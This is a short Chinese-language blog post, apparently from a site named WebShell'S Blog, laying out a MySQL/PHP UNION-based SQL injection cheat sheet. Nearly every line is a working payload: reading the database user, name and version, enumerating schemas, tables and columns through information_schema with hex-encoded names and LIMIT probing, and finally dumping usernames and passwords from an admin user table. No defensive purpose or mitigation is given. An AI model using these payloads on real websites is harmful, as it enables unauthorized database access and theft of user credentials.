Mysql5+php 注入查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
二.查数据库
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
三.暴表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
四.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
五.暴数据
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/779.html